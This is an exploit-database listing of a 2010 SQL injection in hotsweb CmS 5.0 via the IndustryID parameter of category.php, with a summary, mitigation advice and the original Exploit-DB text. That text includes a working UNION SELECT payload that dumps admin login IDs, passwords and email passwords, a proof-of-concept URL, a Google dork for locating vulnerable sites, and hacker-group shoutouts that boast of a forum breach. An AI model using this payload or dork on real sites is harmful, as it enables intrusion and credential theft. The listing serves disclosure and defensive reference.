header-logo
Suggest Exploit
vendor:
CmS
by:
spykit
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CmS
Affected Version From: 5.0
Affected Version To: 5.0
Patch Exists: NO
Related CWE: N/A
CPE: a:hotsweb:cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

CmS (id) SQL Injection Vulnerability

A vulnerability exists in CmS version 5.0, where an attacker can inject malicious SQL queries via the 'IndustryID' parameter in the 'category.php' script. An attacker can use the 'union all select' statement to extract sensitive information from the database, such as login credentials.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------
CmS (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
---------------------------------------------------------------

Exploitz:
~~~~~~~

union all select
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
admin--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
----------------------------------------------------------------

Shoutz:
~~~~

- 'oH lawd !! Malingsial lame forum g0t hacked for second times by
Us,lulz...'
-
LeQhi,lingah,GheMaX,v3n0m,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR,xtr0nic,adwisatya, and all member crew devilzc0de...
-hendri_note: jgn suka ngambek kang malu sama umur.. bruakkakaka
- #devilzc0de @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

spykit | devilzc0de CREW | daniel_sapuleka@yahoo.com
Homepage: http://devilzc0de.org

---------------------------[EOF]--------------------------------

Navigation

Suggest Exploit

Services By CQR